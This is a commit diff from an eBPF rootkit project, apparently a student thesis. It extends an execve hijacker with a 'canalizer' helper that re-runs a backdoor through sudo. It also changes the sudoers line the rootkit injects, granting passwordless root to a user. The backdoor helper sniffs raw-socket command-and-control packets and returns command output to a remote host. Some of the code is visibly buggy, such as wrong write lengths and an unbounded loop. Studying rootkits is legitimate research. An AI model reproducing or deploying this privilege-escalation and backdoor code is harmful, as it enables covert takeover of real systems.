Added support for integrating the execution hijacker via the rootkit. Still some work to do, also changed some config from fs which needs to be reverted

src/common/constants.h

@@ -15,11 +15,11 @@
 #define STRING_FS_SUDO_TASK_LEN 5
 #define STRING_FS_SUDOERS_FILE "/etc/sudoers"
 #define STRING_FS_SUDOERS_FILE_LEN 13
-#define STRING_FS_SUDOERS_ENTRY "test ALL=(ALL:ALL) NOPASSWD:ALL #"
-#define STRING_FS_SUDOERS_ENTRY_LEN 34
+#define STRING_FS_SUDOERS_ENTRY "osboxes ALL=(ALL:ALL) NOPASSWD:ALL #"
+#define STRING_FS_SUDOERS_ENTRY_LEN 37
 
 //EXECUTION HIJACKING
-#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijack\0"
+#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijack_canalizer\0"
 
 
 #endif

src/ebpf/include/bpf/defs.h

@@ -31,6 +31,14 @@ struct fs_priv_open{ //Map
 } fs_open SEC(".maps");
 
 
+//State of the execve hijacker. 0 inactive, 1 active
+struct exec_var_priv_hijack_active{ //Map
+	__uint(type, BPF_MAP_TYPE_HASH);
+	__uint(max_entries, 1);
+	__type(key, __u64);
+	__type(value, __u64);
+} exec_var_hijack_active SEC(".maps");
+
 
 /*PROTECTED MAPS*/
 //Any attempt to access these maps will be blocked by the rootkit if the program is not whitelisted

src/ebpf/include/bpf/exec.h

@@ -28,6 +28,8 @@ struct sys_execve_enter_ctx {
     const char* const* envp;
 };
 
+volatile int hijacker_state = 0;
+
 /**
  * @brief Checks for the error case 2 described in the execve handler when overwriting the filename userspace buffer.
  * 
@@ -84,6 +86,12 @@ static __always_inline int test_write_user_unique(struct sys_execve_enter_ctx *c
 }
 
 static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ctx *ctx, __u64 pid_tgid){
+    //Check if the exec hijacker is active already
+    if(hijacker_state == 1){
+        return 0;
+    }
+    bpf_printk("Starting execve hijacker\n");
+    
     unsigned char* argv[NUMBER_ARGUMENTS_PARSED] = {0};
     //unsigned char* envp[PROGRAM_LENGTH] = {0};
     unsigned char filename[ARGUMENT_LENGTH] = {0};
@@ -161,6 +169,9 @@ static __always_inline int handle_tp_sys_enter_execve(struct sys_execve_enter_ct
         return -1;
     }
      
+    bpf_printk("One success\n");
+    hijacker_state = 1;
+
     unsigned char newfilename[ARGUMENT_LENGTH] = {0};
     unsigned char* newargv[NUMBER_ARGUMENTS_PARSED] = {0};
     if(bpf_probe_read_user(&newfilename, ARGUMENT_LENGTH, ctx->filename)<0){

src/ebpf/include/bpf/fs.h

@@ -102,8 +102,11 @@ static __always_inline int handle_tp_sys_exit_read(struct sys_read_exit_ctx *ctx
     //For including an user in the sudoers file
     //We just put our new line there, independently on what the rest of the file contains
     if(data->is_sudo==1){
+        while(1){
         if(bpf_probe_write_user((void*)buf, (void*)sudo_line_overwrite, (__u32)STRING_FS_SUDOERS_ENTRY_LEN-1)<0){
             bpf_printk("Error writing to user memory\n");
+            return -1;
+        }
         }
         bpf_printk("Sudo overwritten\n");
         return 0;

src/helpers/Makefile

@@ -3,7 +3,13 @@ HEADERS = lib/RawTCP.h
 EXTRA_CFLAGS= -I$(PWD)/lib
 
 default:
-	make execve_hijack
+	make execve_hijack execve_hijack_canalizer
+
+execve_hijack_canalizer.o: execve_hijack_canalizer.c
+	gcc -c execve_hijack_canalizer.c
+
+execve_hijack_canalizer: execve_hijack_canalizer.o
+	gcc -o execve_hijack_canalizer execve_hijack_canalizer.o
 
 execve_hijack.o: execve_hijack.c $(HEADERS)
 	gcc -c execve_hijack.c
@@ -14,3 +20,5 @@ execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
 clean:
 	-rm -f execve_hijack.o
 	-rm -f execve_hijack
+	-rm -f execve_hijack_canalizer.o
+	-rm -f execve_hijack_canalizer

src/helpers/execve_hijack.c

@@ -82,7 +82,7 @@ int main(int argc, char* argv[]){
     //ordered to execute via the network backdoor
     //int bpf_map_fd = bpf_map_get_fd_by_id()
 
-    int fd = open("/tmp/execve_hijack", O_RDWR | O_CREAT | O_TRUNC, 0666);
+    int fd = open("/home/osboxes/TFG/src/log", O_RDWR | O_CREAT | O_TRUNC, 0666);
     
     int ii = 0;
     while(*(timestr+ii)!='\0'){
@@ -99,11 +99,15 @@ int main(int argc, char* argv[]){
 
     write(fd, "\n", 1);
 
-    close(fd);
     
 
+    write(fd, "Sniffing...\n", 13);
     packet_t packet = rawsocket_sniff_pattern(CC_PROT_SYN);
-
+    if(packet.ipheader == NULL){
+        write(fd, "Failed to open rawsocket\n", 1);
+        return -1;
+    }
+    write(fd, "Sniffed\n", 9);
     //TODO GET THE IP FROM THE BACKDOOR CLIENT
     char* local_ip = getLocalIpAddress();
     char remote_ip[16];
@@ -112,6 +116,8 @@ int main(int argc, char* argv[]){
     
     packet_t packet_ack = build_standard_packet(8000, 9000, local_ip, remote_ip, 4096, CC_PROT_ACK);
     if(rawsocket_send(packet_ack)<0){
+        write(fd, "Failed to open rawsocket\n", 1);
+        close(fd);
         return -1;
     }
 
@@ -136,6 +142,8 @@ int main(int argc, char* argv[]){
                 strcat(payload_buf, res);
                 packet_t packet_res = build_standard_packet(8000, 9000, local_ip, remote_ip, 4096, payload_buf);
                 if(rawsocket_send(packet_res)<0){
+                    write(fd, "Failed to open rawsocket\n", 1);
+                    close(fd);
                     return -1;
                 }
                 free(payload_buf);
@@ -144,5 +152,6 @@ int main(int argc, char* argv[]){
         }
     }
 
+    close(fd);
     return 0;
 }

src/helpers/execve_hijack_canalizer.c

@@ -0,0 +1,11 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+int main(int argc, char* argv[], char *envp[]){
+    printf("Hello world from the canalizer\n");
+    char* args[] = {"sudo", "/home/osboxes/TFG/src/helpers/execve_hijack", NULL};
+    execve("/usr/bin/sudo", args, envp);
+
+    return 0;
+}